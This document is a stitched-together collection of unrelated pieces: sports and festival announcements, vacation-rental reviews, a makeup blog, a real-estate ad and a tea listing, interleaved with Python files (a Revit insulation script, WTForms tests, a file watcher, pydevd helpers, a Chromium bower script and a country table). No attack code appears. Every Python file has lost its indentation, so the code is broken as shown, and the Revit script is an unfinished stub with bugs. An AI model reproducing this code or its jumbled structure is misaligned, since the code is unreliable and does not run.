Fans can greet the Tech football team on its walk to Bobby Dodd Stadium 2.5 hours prior to kickoff of every home game. The Yellow Jackets make the three-block walk down Brittain Drive with the band leading the way.
CLUB PATRON IN-SEAT SERVICE In an effort to improve the VIP experience for our season ticket holders in our club section, a new in-seat service will be provided on game days so fans won’t miss a single play. |
# coding: utf8
import rpw
from rpw import DB, revit
from rpw import logger
__doc__ = "Auto"
__title__ = "Auto Insulate"
__author__ = "Cyril Waechter"
__context__ = "Selection"
# TODO
def apply_size_rule(size, rule):
pass
def set_system_rule(mep_system):
mep_system
return # rule
def get_element_mep_systems(element):
mep_system = []
if isinstance(element, DB.MEPCurve):
mep_system.append(element.MEPsystem)
elif isinstance(element, DB.FamilyInstance):
for connector in element.MEPModel.ConnectorManager.Connectors:
if connector.MEPSystem:
mep_system.append(element.MEPModel.ConnectorManager.Connectors)
else:
logger.info("No system found in element {}".format(element))
return mep_system
def get_nominal_diameter(element):
if isinstance(element, DB.MEPCurve):
return element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_DIAMETER_PARAM).AsDouble()
if isinstance(element, DB.FamilyInstance):
return 2 * max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)
class ConnectorsBreadthFirstSearch:
def __init__(self, element):
self.element = element
self.nominal_diameter = 2 * max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)
self.queue = [element]
self.visited = []
def outside_diameter_search(self):
if self.queue:
current_element = self.queue.pop(0)
print current_element
if isinstance(current_element, DB.Plumbing.Pipe):
return current_element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_OUTER_DIAMETER).AsDouble()
else:
self.visited.append(current_element)
for connector in current_element.MEPModel.ConnectorManager.Connectors:
for ref in connector.AllRefs:
if isinstance(ref.Owner, (DB.FamilyInstance, DB.Plumbing.Pipe)):
if ref.Owner not in self.visited and ref.Radius * 2 >= self.nominal_diameter:
self.queue.append(ref.Owner)
return self.outside_diameter_search()
else:
return self.nominal_diameter
def get_outer_diameter(element):
if isinstance(element, DB.Plumbing.Pipe):
return element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_OUTER_DIAMETER).AsDouble()
if isinstance(element, DB.FamilyInstance):
for connector in element.MEPModel.ConnectorManager.Connectors:
for sub_con in connector.AllRefs:
logger.debug(sub_con.Owner)
get_outer_diameter(sub_con.Owner)
def get_inner_diameter(element):
if isinstance(element, DB.MEPCurve):
element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_INNER_DIAM_PARAM)
if isinstance(element, DB.FamilyInstance):
max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)
# InsulationLiningBase.GetInsulationIds
# for element in rpw.ui.Selection():
# element
# # TODO Determine system rule
# mep_systems = get_element_mep_systems(element)
# if mep_systems:
# rule = set_system_rule(mep_systems[0])
# # TODO Apply size rule
# apply_size_rule(size, rule)
# TODO GUI to set and save configuration
|
Saturday 23 June 2018 will see Perth celebrating the Year of Young People 2018 (YOYP2018) in spectacular style with a day-long event putting young people aged eight to 26 in the spotlight.
The Diverse CiTay Festival is supported by the Year of Young People 2018 event fund, managed by EventScotland, part of VisitScotland's Event Directorate. The day will highlight the best of Perth and Kinross, with an exciting mix of music, theatre, art, culture, sport, health and wellbeing as well as highlighting young entrepreneurs between 12.30pm and 10pm at various locations around the city centre. Diverse CiTay has been co-produced by local young people with support from local bodies and organisations.
In Perth Diverse CiTay will be a celebration of Perth and Kinross's young residents and visitors, highlighting the importance of young people to the future of our city, our region and our economy.
The festival kicks off at 12.30pm with a carnival parade with a colourful, vibrant display of floats, vehicles, dance troupes and bands will head from the South Inch along Tay Street to the North Inch park, where the North Inch Carnival will run from 1pm to 4.30pm, with a vibrant mix of performers, entertainment and activities.
The Music Stage at the Carnival will be hosted by dance music giant Ministry of Sound, with sets from the House & Garage Orchestra, as seen on 1Xtra's Live Lounge, and very special guests Jack Maynard and Karen Harding. Also appearing on the Music Stage will be Dundee pop band Be Charlotte and Scottish singer-songwriter Mikey. Alongside this, there will be plenty of other things to enjoy including a funfair, inflatables, a bike stunt team, and much more.
If keeping healthy and active is more your thing, then the Perth College UHI Sports, Healthy & Wellbeing villages are for you! A range of sports from volleyball to archery, as well as a chill-out area and access to wellbeing activities and health advice, such as relaxation and meditation, and smoking cessation information, will be on offer.
Just a short walk away, between 5pm and 10pm, the Mill Street Youth Market will give young creators and business operators an opportunity to demonstrate their entrepreneurial spirit and creativity, offering a range of goods and services for sale, accompanied by food stalls, busking musicians, and a climbing wall. Local young musicians and bands will be featured on the Music Stage in the Horsecross plaza, with performances from Parliamo, Stop the Rain, Saharatheband and singer-songwriter Mikey, and DJ sets from Wize.
Nearby Perth Museum and Art Gallery will feature exhibitions created by local young people, focussing on the centenary of the end of World War One, and on self-image and identity. The exhibitions are free to attend and open from 10am to 5pm. Perthshire Creates' Summer Contemporary Design Market will also be held on the same day, in the Civic Hall at 2 High Street, Perth, presenting the best of locally produced arts and crafts between 10am and 4.30pm.
At the other end of Mill Street, a Youth Takeover of Perth Theatre will see a diverse range of free workshops, activities and events between 10am and 9.30pm. Fancy finding out more about theatre and stagecraft, or trying your hand at music, crafts or rapping and DJ skills? There's lots on offer, and the Takeover ends with an under 18's After Party, complete with silent disco and local bands performing.
Diverse CiTay Working Group Co-Chairs Robert McCall MSYP and Siusaidh Johnston commented: "In the Year of Young People 2018, we were keen to see a day that celebrates the achievements, ambition and interests of young people in Perth and Kinross. With the support of Perth & Kinross Council, Perth College UHI, Horsecross Arts and Culture Perth and Kinross, Diverse CiTay has been developed and co-produced by young people locally. There is so much going on in Perth city centre on Saturday 23 June that it would be a shame to miss it! If you live in Perth and Kinross and are aged eight to 26, please get involved and make it an incredible day for us all!"
Further information about the Diverse CiTay Festival and how you can get involved is available from the Perth City Centre website, perthcity.co.uk. |
#!/usr/bin/env python
from unittest import TestCase
from wtforms.validators import StopValidation, ValidationError, email, equal_to, ip_address, length, required, optional, regexp, url, NumberRange, AnyOf, NoneOf, unicode
class DummyTranslations(object):
def gettext(self, string):
return string
def ngettext(self, singular, plural, n):
if n == 1:
return singular
return plural
class DummyForm(dict):
pass
class DummyField(object):
_translations = DummyTranslations()
def __init__(self, data, errors=(), raw_data=None):
self.data = data
self.errors = list(errors)
self.raw_data = raw_data
def gettext(self, string):
return self._translations.gettext(string)
def ngettext(self, singular, plural, n):
return self._translations.ngettext(singular, plural, n)
def grab_error_message(callable, form, field):
try:
callable(form, field)
except ValidationError:
import sys
e = sys.exc_info()[1]
return e.args[0]
class ValidatorsTest(TestCase):
def setUp(self):
self.form = DummyForm()
def test_email(self):
self.assertEqual(email()(self.form, DummyField('[email protected]')), None)
self.assertEqual(email()(self.form, DummyField('[email protected]')), None)
self.assertEqual(email()(self.form, DummyField('[email protected]')), None)
self.assertEqual(email()(self.form, DummyField('[email protected]')), None)
self.assertRaises(ValidationError, email(), self.form, DummyField(None))
self.assertRaises(ValidationError, email(), self.form, DummyField(''))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo'))
self.assertRaises(ValidationError, email(), self.form, DummyField('bar.dk'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@'))
self.assertRaises(ValidationError, email(), self.form, DummyField('@bar.dk'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@bar'))
self.assertRaises(ValidationError, email(), self.form, DummyField('[email protected]'))
self.assertRaises(ValidationError, email(), self.form, DummyField('[email protected]'))
def test_equal_to(self):
self.form['foo'] = DummyField('test')
self.assertEqual(equal_to('foo')(self.form, self.form['foo']), None)
self.assertRaises(ValidationError, equal_to('invalid_field_name'), self.form, DummyField('test'))
self.assertRaises(ValidationError, equal_to('foo'), self.form, DummyField('different_value'))
def test_ip_address(self):
self.assertEqual(ip_address()(self.form, DummyField('127.0.0.1')), None)
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('abc.0.0.1'))
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('1278.0.0.1'))
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('127.0.0.abc'))
def test_length(self):
field = DummyField('foobar')
self.assertEqual(length(min=2, max=6)(self.form, field), None)
self.assertRaises(ValidationError, length(min=7), self.form, field)
self.assertEqual(length(min=6)(self.form, field), None)
self.assertRaises(ValidationError, length(max=5), self.form, field)
self.assertEqual(length(max=6)(self.form, field), None)
self.assertRaises(AssertionError, length)
self.assertRaises(AssertionError, length, min=5, max=2)
# Test new formatting features
grab = lambda **k : grab_error_message(length(**k), self.form, field)
self.assertEqual(grab(min=2, max=5, message='%(min)d and %(max)d'), '2 and 5')
self.assert_('at least 8' in grab(min=8))
self.assert_('longer than 5' in grab(max=5))
self.assert_('between 2 and 5' in grab(min=2, max=5))
def test_required(self):
self.assertEqual(required()(self.form, DummyField('foobar')), None)
self.assertRaises(StopValidation, required(), self.form, DummyField(''))
self.assertRaises(StopValidation, required(), self.form, DummyField(' '))
self.assertEqual(required().field_flags, ('required', ))
f = DummyField('', ['Invalid Integer Value'])
self.assertEqual(len(f.errors), 1)
self.assertRaises(StopValidation, required(), self.form, f)
self.assertEqual(len(f.errors), 0)
def test_optional(self):
self.assertEqual(optional()(self.form, DummyField('foobar', raw_data=['foobar'])), None)
self.assertRaises(StopValidation, optional(), self.form, DummyField('', raw_data=['']))
self.assertRaises(StopValidation, optional(), self.form, DummyField(' ', raw_data=[' ']))
self.assertEqual(optional().field_flags, ('optional', ))
f = DummyField('', ['Invalid Integer Value'], raw_data=[''])
self.assertEqual(len(f.errors), 1)
self.assertRaises(StopValidation, optional(), self.form, f)
self.assertEqual(len(f.errors), 0)
def test_regexp(self):
import re
# String regexp
self.assertEqual(regexp('^a')(self.form, DummyField('abcd')), None)
self.assertEqual(regexp('^a', re.I)(self.form, DummyField('ABcd')), None)
self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField('foo'))
self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField(None))
# Compiled regexp
self.assertEqual(regexp(re.compile('^a'))(self.form, DummyField('abcd')), None)
self.assertEqual(regexp(re.compile('^a', re.I))(self.form, DummyField('ABcd')), None)
self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField('foo'))
self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField(None))
def test_url(self):
self.assertEqual(url()(self.form, DummyField('http://foobar.dk')), None)
self.assertEqual(url()(self.form, DummyField('http://foobar.dk/')), None)
self.assertEqual(url()(self.form, DummyField('http://foobar.museum/foobar')), None)
self.assertEqual(url()(self.form, DummyField('http://127.0.0.1/foobar')), None)
self.assertEqual(url()(self.form, DummyField('http://127.0.0.1:9000/fake')), None)
self.assertEqual(url(require_tld=False)(self.form, DummyField('http://localhost/foobar')), None)
self.assertEqual(url(require_tld=False)(self.form, DummyField('http://foobar')), None)
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar'))
self.assertRaises(ValidationError, url(), self.form, DummyField('foobar.dk'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://127.0.0/asdf'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.d'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.12'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://localhost:abc/a'))
def test_number_range(self):
v = NumberRange(min=5, max=10)
self.assertEqual(v(self.form, DummyField(7)), None)
self.assertRaises(ValidationError, v, self.form, DummyField(None))
self.assertRaises(ValidationError, v, self.form, DummyField(0))
self.assertRaises(ValidationError, v, self.form, DummyField(12))
onlymin = NumberRange(min=5)
self.assertEqual(onlymin(self.form, DummyField(500)), None)
self.assertRaises(ValidationError, onlymin, self.form, DummyField(4))
onlymax = NumberRange(max=50)
self.assertEqual(onlymax(self.form, DummyField(30)), None)
self.assertRaises(ValidationError, onlymax, self.form, DummyField(75))
def test_lazy_proxy(self):
"""Tests that the validators support lazy translation strings for messages."""
class ReallyLazyProxy(object):
def __unicode__(self):
raise Exception('Translator function called during form declaration: it should be called at response time.')
__str__ = __unicode__
message = ReallyLazyProxy()
self.assertRaises(Exception, str, message)
self.assertRaises(Exception, unicode, message)
self.assert_(equal_to('fieldname', message=message))
self.assert_(length(min=1, message=message))
self.assert_(NumberRange(1,5, message=message))
self.assert_(required(message=message))
self.assert_(regexp('.+', message=message))
self.assert_(email(message=message))
self.assert_(ip_address(message=message))
self.assert_(url(message=message))
def test_any_of(self):
self.assertEqual(AnyOf(['a', 'b', 'c'])(self.form, DummyField('b')), None)
self.assertRaises(ValueError, AnyOf(['a', 'b', 'c']), self.form, DummyField(None))
def test_none_of(self):
self.assertEqual(NoneOf(['a', 'b', 'c'])(self.form, DummyField('d')), None)
self.assertRaises(ValueError, NoneOf(['a', 'b', 'c']), self.form, DummyField('a'))
if __name__ == '__main__':
from unittest import main
main()
|
Love to shop: Marco offers a wide variety of boutiques and specialty shops to discover. For a faster pace, take a trip into Naples where you will find everything from malls, to designer outlets, to the fashionable Third Street South, and Fifth Avenue South areas with charming boutiques, galleries, and restaurants.
Time for dining: The choice is yours. There is everything from the good old American hamburger to haute cuisine. Kick back with a tropical drink at one of the chickee huts. Enjoy some of the finest seafood found anywhere, fresh out of the Gulf or the backwaters.
Ready to play? Florida's two most popular sports off of the water would have to be tennis and golf.
available throughout the Naples area.
Beautiful house! Very thoughtfully put together. The things that make a great holiday were all available. Airboat ride in the Everglades should not be missed!
Had a lovely stay. A lovely home with super pool, very comfortable, would like to come back!
Love your beautiful home! We've had a great time. Would recommend Tokyo Inn, Arturos, Jakes and a day out on the Marco River Marina rentals.
Loved this beautiful house! We recommend to go to Miami Beach, and the air boat riding at Speedy Johnsons on the Everglades.
We've had a great two weeks relaxing in your beautiful house!
Thank you for sharing your beautiful home with us. We've had a very relaxing week here after a Disney week in Orlando. The trip to "Speedy Johnsons" was very worthwhile. Our favorite dining was at Voyage while watching the sunset, and it's cheaper if seated before 8:30.
This was the relaxing part of our holiday after spending 11 days in Orlando doing the Disney tour. What a wonderful surprise to arrive at your splendid and most beautiful home. The children adored the pool - fantastic. Captain Doug House's Air boat one hour ride is out of this world. They even let the children drive the boat! Thanks so much.
Just a note to say we enjoyed our stay at your home in Marco Island last week. The weather was great all week. Thanks for allowing us to bring our two dachshunds with us. They have been making the trip with us since they were pups. The dogs really enjoy going out in the boat to fish. |
#!/usr/bin/python3
import argparse
import os
import subprocess
import time
import signal
# Avoid zombie process
signal.signal(signal.SIGCHLD, signal.SIG_IGN)
# Exit after receiving Control-C
signal.signal(signal.SIGINT, signal.SIG_DFL)
parser = argparse.ArgumentParser(prog='watcher.py',
description='Simple filesystem watcher')
parser.add_argument('-l', '--files-list',
help='document with list of files to observe')
parser.add_argument('-f', '--files', nargs='*',
help='files to observe')
parser.add_argument('-c', '--command',
help='command to execute')
parser.add_argument('-n', '--no-shell', action='store_false',
help='do not use shell while evaluating command')
args = parser.parse_args()
if args.files_list != None:
files = [line.rstrip('\n') for line in open(args.files_list)]
elif args.files:
files = args.files
else:
files = os.listdir()
# get initial modification time for files
for k, v in enumerate(files):
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(v)
files[k] = [v, mtime]
args.command = '' if not args.command else args.command
process = subprocess.Popen(args.command, shell=args.no_shell)
# watch & restart loop
while 1:
reloaded = False
for k, v in enumerate(files):
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(v[0])
if mtime != v[1] and not reloaded:
try:
process.wait(1)
except:
process.send_signal(1)
process = subprocess.Popen(args.command, shell=args.no_shell)
reloaded = True
files[k][1] = mtime
time.sleep(1)
|
May has been bonkers, guys!
I covered The Makeup Show NYC the first weekend of May, and as always, it was packed with educational opportunities, brands to discover and LOTS of awesome shopping. But of course it’s almost Memorial Day and I’m finally getting around to my usual show recaps today!
So where to start…hmmm….I decided to break up my approach, because I typically throw it all into one post and it’s humongous. So how about a quick-hit list of the top things I heard from sessions I attended? This year I sought out education not just for blog and freelance fodder, but to soak it in as an aspiring makeup artist!
I attended Kevin James Bennett’s feature presentation, “Makeup Kit Breakdown,” to truly learn not just what a makeup artist might carry in their kit, but to understand what products and types of taskers artists rely on.
Keep it really simple. It’s easy to over pack your kit, but you don’t have to.
Consider the ingredients of your products – are you using wax-based? Oil-based? Cream-based? Are you being consistent across the board? Research and learn about ingredients and formulations and make a conscious decision about what you want to carry in your kit.
Always prep your client’s skin – even if they say they didn’t put anything on their face, cleanse and prep it!
He recommended great palettes for artists to keep on hand – like a color correcting palette and palette you can use to adjust the shade of foundation you’re working with.
Carry 100% pure silicone – it’s a great oil-absorbing agent and is a great primer. If you buff it onto skin before applying foundation you won’t need an oil control product.
Keep the conversation to a minimum while you’re working – it’s all about making the client feel and look good.
Keep matte neutral shadows and saturated brights in your kit.
You don’t need to go to school to become a makeup artist but learn technique, put the time in to get yourself educated and assist other makeup artists you admire.
“This is hard, it’s a job,” Kevin said.
There was a lot more education than I could attend, but I hope you enjoyed these insights from the sessions I was able to make! Is there anything here that resonates with you? I feel that sometimes the tips that are given to the artists attending this pro show are so applicable to all of us. Like knowing your strengths and weaknesses, and learning proper technique. I’d love to hear your thoughts! |
from __future__ import nested_scopes
import traceback
import os
try:
from urllib import quote
except:
from urllib.parse import quote # @UnresolvedImport
from _pydevd_bundle import pydevd_constants
import sys
from _pydev_bundle import pydev_log
def save_main_module(file, module_name):
# patch provided by: Scott Schlesier - when script is run, it does not
# use globals from pydevd:
# This will prevent the pydevd script from contaminating the namespace for the script to be debugged
# pretend pydevd is not the main module, and
# convince the file to be debugged that it was loaded as main
sys.modules[module_name] = sys.modules['__main__']
sys.modules[module_name].__name__ = module_name
from imp import new_module
m = new_module('__main__')
sys.modules['__main__'] = m
if hasattr(sys.modules[module_name], '__loader__'):
setattr(m, '__loader__', getattr(sys.modules[module_name], '__loader__'))
m.__file__ = file
return m
def to_number(x):
if is_string(x):
try:
n = float(x)
return n
except ValueError:
pass
l = x.find('(')
if l != -1:
y = x[0:l-1]
#print y
try:
n = float(y)
return n
except ValueError:
pass
return None
def compare_object_attrs(x, y):
try:
if x == y:
return 0
x_num = to_number(x)
y_num = to_number(y)
if x_num is not None and y_num is not None:
if x_num - y_num<0:
return -1
else:
return 1
if '__len__' == x:
return -1
if '__len__' == y:
return 1
return x.__cmp__(y)
except:
if pydevd_constants.IS_PY3K:
return (to_string(x) > to_string(y)) - (to_string(x) < to_string(y))
else:
return cmp(to_string(x), to_string(y))
def cmp_to_key(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj, *args):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) < 0
def __gt__(self, other):
return mycmp(self.obj, other.obj) > 0
def __eq__(self, other):
return mycmp(self.obj, other.obj) == 0
def __le__(self, other):
return mycmp(self.obj, other.obj) <= 0
def __ge__(self, other):
return mycmp(self.obj, other.obj) >= 0
def __ne__(self, other):
return mycmp(self.obj, other.obj) != 0
return K
if pydevd_constants.IS_PY3K:
def is_string(x):
return isinstance(x, str)
else:
def is_string(x):
return isinstance(x, basestring)
def to_string(x):
if is_string(x):
return x
else:
return str(x)
def print_exc():
if traceback:
traceback.print_exc()
if pydevd_constants.IS_PY3K:
def quote_smart(s, safe='/'):
return quote(s, safe)
else:
def quote_smart(s, safe='/'):
if isinstance(s, unicode):
s = s.encode('utf-8')
return quote(s, safe)
def _get_project_roots(project_roots_cache=[]):
# Note: the project_roots_cache is the same instance among the many calls to the method
if not project_roots_cache:
roots = os.getenv('IDE_PROJECT_ROOTS', '').split(os.pathsep)
pydev_log.debug("IDE_PROJECT_ROOTS %s\n" % roots)
new_roots = []
for root in roots:
new_roots.append(os.path.normcase(root))
project_roots_cache.append(new_roots)
return project_roots_cache[-1] # returns the project roots with case normalized
def not_in_project_roots(filename, filename_to_not_in_scope_cache={}):
# Note: the filename_to_not_in_scope_cache is the same instance among the many calls to the method
try:
return filename_to_not_in_scope_cache[filename]
except:
project_roots = _get_project_roots()
filename = os.path.normcase(filename)
for root in project_roots:
if filename.startswith(root):
filename_to_not_in_scope_cache[filename] = False
break
else: # for else (only called if the break wasn't reached).
filename_to_not_in_scope_cache[filename] = True
# at this point it must be loaded.
return filename_to_not_in_scope_cache[filename]
def is_filter_enabled():
return os.getenv('PYDEVD_FILTERS') is not None
def is_filter_libraries():
return os.getenv('PYDEVD_FILTER_LIBRARIES') is not None
def _get_stepping_filters(filters_cache=[]):
if not filters_cache:
filters = os.getenv('PYDEVD_FILTERS', '').split(';')
new_filters = []
for new_filter in filters:
new_filters.append(new_filter)
filters_cache.append(new_filters)
return filters_cache[-1]
def is_ignored_by_filter(filename, filename_to_ignored_by_filters_cache={}):
try:
return filename_to_ignored_by_filters_cache[filename]
except:
import fnmatch
for stepping_filter in _get_stepping_filters():
if fnmatch.fnmatch(filename, stepping_filter):
pydev_log.debug("File %s ignored by filter %s" % (filename, stepping_filter))
filename_to_ignored_by_filters_cache[filename] = True
break
else:
filename_to_ignored_by_filters_cache[filename] = False
return filename_to_ignored_by_filters_cache[filename]
|
Innovation, flexibility, style – just three of the many words that describe IRONWORKS, a unique and inspiring offering of commercial real estate for sale in Vancouver, BC.
A rare opportunity to acquire ownership in a flagship commercial development in Vancouver, IRONWORKS is located at 220 Victoria Drive, in the heart of the growing Port Town community of East Vancouver. This is a place that thrives on hard work; where entrepreneurial spirit and neighbourly values converge.
IRONWORKS sets the standard for commercial real estate, with both office and warehouse spaces available for purchase. Meticulously designed to meld flexible use of space and functional design, with a modern flair that inspires vision and creativity, IRONWORKS is where successful entrepreneurs want to build their legacy.
IRONWORKS is where you want to be!
Considering commercial real estate for sale in Gastown, East Vancouver, or other areas near downtown? IRONWORKS will check the boxes on your wish list, and then some. Backed by stunning views of Burrard Inlet and the North Shore mountains, IRONWORKS is one of the most progressive and flexible offerings of commercial real estate for sale in Vancouver, building on the rich history of this unassuming, yet bustling neighbourhood.
There is no shortage of amenities in this unique neighbourhood. Grab a coffee and a quick breakfast from a nearby bakery. Do business over lunch along Commercial Drive or Hastings. Relax with an after-work beer at one of the East Van craft breweries. The possibilities are endless to fulfill your work-lifestyle balance, right here in Port Town.
Contact us to learn more about purchasing space for sale at IRONWORKS, Vancouver’s premier mixed-use commercial real estate opportunity.
*I agree to allow Ironworks Developments Ltd. and Cushman & Wakefield, on behalf of Ironworks to contact me and send me updates by phone or email. |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import re
COMPONENTS_DIR = 'components'
DESTINATION_COMPONENTS_DIR = 'components-chromium'
COMPONENT_SUMMARY =\
"""Name: %(name)s
Repository: %(repository)s
Tree: %(tree)s
Revision: %(revision)s
Tree link: %(tree_link)s
"""
def PrintSummary(info):
repository = info['_source']
resolution = info['_resolution']
tree = GetTreeishName(resolution)
# Convert to web link.
repository_web = re.sub('^git:', 'https:', re.sub('\.git$', '', repository))
# Specify tree to browse to.
tree_link = repository_web + '/tree/' + tree
print COMPONENT_SUMMARY % {
'name': info['name'],
'repository': repository,
'tree': tree,
'revision': resolution['commit'],
'tree_link': tree_link
}
def GetTreeishName(resolution):
"""Gets the name of the tree-ish (branch, tag or commit)."""
if resolution['type'] == 'branch':
return resolution['branch']
if resolution['type'] in ('version', 'tag'):
return resolution['tag']
return resolution['commit']
def main():
for entry in sorted(os.listdir(DESTINATION_COMPONENTS_DIR)):
component_path = os.path.join(COMPONENTS_DIR, entry)
if not os.path.isdir(component_path):
continue
bower_path = os.path.join(component_path, '.bower.json')
if not os.path.isfile(bower_path):
raise Exception('%s is not a file.' % bower_path)
with open(bower_path) as stream:
info = json.load(stream)
PrintSummary(info)
if __name__ == '__main__':
main()
|
Black tea "Curtis" Orange & Chocolate (25 count) buy for 3.2900 in store RussianTable with delivery.
Brighten up your day with a summer mood by tasting the CURTIS Orange & Chocolate Tea that will fill you with energy for the whole day thanks to its unexpected combination of distinguished black tea and a flavor of chocolate and orange.
Do you have any questions about Black tea "Curtis" Orange & Chocolate (25 count)? |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import collections
"""List of countries the EVC uses."""
countries = collections.OrderedDict()
countries["Japan"] = ["日本", "Japan", "Japan", "Japon", "Japón", "Giappone", "Japan"]
countries["Argentina"] = ["アルゼンチン", "Argentina", "Argentinien", "Argentine", "Argentina", "Argentina", "Argentinië"]
countries["Brazil"] = ["ブラジル", "Brazil", "Brasilien", "Brésil", "Brasil", "Brasile", "Brazilië"]
countries["Canada"] = ["カナダ", "Canada", "Kanada", "Canada", "Canadá", "Canada", "Canada"]
countries["Chile"] = ["チリ", "Chile", "Chile", "Chili", "Chile", "Cile", "Chili"]
countries["Colombia"] = ["コロンビア", "Colombia", "Kolumbien", "Colombie", "Colombia", "Colombia", "Colombia"]
countries["Costa Rica"] = ["コスタリカ", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica", "Costa Rica"]
countries["Ecuador"] = ["エクアドル", "Ecuador", "Ecuador", "Equateur", "Ecuador", "Ecuador", "Ecuador"]
countries["Guatemala"] = ["グアテマラ", "Guatemala", "Guatemala", "Guatemala", "Guatemala", "Guatemala", "Guatemala"]
countries["Mexico"] = ["メキシコ", "Mexico", "Mexiko", "Mexique", "México", "Messico", "Mexico"]
countries["Panama"] = ["パナマ", "Panama", "Panama", "Panama", "Panamá", "Panamá", "Panama"]
countries["Peru"] = ["ペルー", "Peru", "Peru", "Pérou", "Perú", "Perù", "Peru"]
countries["United States"] = ["アメリカ", "United States", "Vereinigte Staaten", "Etats-Unis d’Amérique", "Estados Unidos de América", "Stati Uniti d'America", "Verenigde Staten"]
countries["Venezuela"] = ["ベネズエラ", "Venezuela", "Venezuela", "Venezuela", "Venezuela", "Venezuela", "Venezuela"]
countries["Australia"] = ["オーストラリア", "Australia", "Australien", "Australie", "Australia", "Australia", "Australië"]
countries["Austria"] = ["オーストリア", "Austria", "Österreich", "Autriche", "Austria", "Austria", "Oostenrijk"]
countries["Belgium"] = ["ベルギー", "Belgium", "Belgien", "Belgique", "Bélgica", "Belgio", "België"]
countries["Denmark"] = ["デンマーク", "Denmark", "Dänemark", "Danemark", "Dinamarca", "Danimarca", "Denemarken"]
countries["Finland"] = ["フィンランド", "Finland", "Finnland", "Finlande", "Finlandia", "Finlandia", "Finland"]
countries["France"] = ["フランス", "France", "Frankreich", "France", "Francia", "Francia", "Frankrijk"]
countries["Germany"] = ["ドイツ", "Germany", "Deutschland", "Allemagne", "Alemania", "Germania", "Duitsland"]
countries["Greece"] = ["ギリシャ", "Greece", "Griechenland", "Grèce", "Grecia", "Grecia", "Griekenland"]
countries["Ireland"] = ["アイルランド", "Ireland", "Irland", "Irlande", "Irlanda", "Irlanda", "Ierland"]
countries["Italy"] = ["イタリア", "Italy", "Italien", "Italie", "Italia", "Italia", "Italië"]
countries["Luxembourg"] = ["ルクセンブルク", "Luxembourg", "Luxemburg", "Luxembourg", "Luxemburgo", "Lussemburgo", "Luxemburg"]
countries["Netherlands"] = ["オランダ", "Netherlands", "Niederlande", "Pays-Bas", "Países Bajos", "Paesi Bassi", "Nederland"]
countries["New Zealand"] = ["ニュージーランド", "New Zealand", "Neuseeland", "Nouvelle-Zélande", "Nueva Zelanda", "Nuova Zelanda", "Nieuw-Zeeland"]
countries["Norway"] = ["ノルウェー", "Norway", "Norwegen", "Norvège", "Noruega", "Norvegia", "Noorwegen"]
countries["Poland"] = ["ポーランド", "Poland", "Polen", "Pologne", "Polonia", "Polonia", "Polen"]
countries["Portugal"] = ["ポルトガル", "Portugal", "Portugal", "Portugal", "Portugal", "Portogallo", "Portugal"]
countries["Spain"] = ["スペイン", "Spain", "Spanien", "Espagne", "España", "Spagna", "Spanje"]
countries["Sweden"] = ["スウェーデン", "Sweden", "Schweden", "Suède", "Suecia", "Svezia", "Zweden"]
countries["Switzerland"] = ["スイス", "Switzerland", "Schweiz", "Suisse", "Suiza", "Svizzera", "Zwitserland"]
countries["United Kingdom"] = ["イギリス", "United Kingdom", "Großbritannien", "Royaume-Uni", "Reino Unido", "Regno Unito", "Verenigd Koninkrijk"]
"""List of country codes."""
country_codes = [1, 10, 16, 18, 20, 21, 22, 25, 30, 36, 40, 42, 49, 52, 65, 66, 67, 74, 76, 77, 78, 79, 82, 83, 88, 94, 95, 96, 97, 98, 105, 107, 108, 110]
"""These lists tell the script how many entries are used for the position tables."""
"""(if it's more than 1, that must mean the region is split up into multiple parts)"""
position_table = collections.OrderedDict()
position_table[1] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2]
position_table[16] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1]
position_table[18] = [1, 1, 2, 1, 1, 3, 1, 1, 1, 1, 1, 4, 3]
position_table[21] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0]
position_table[36] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[40] = [2, 0, 1, 1, 1, 0, 0, 1, 1, 2]
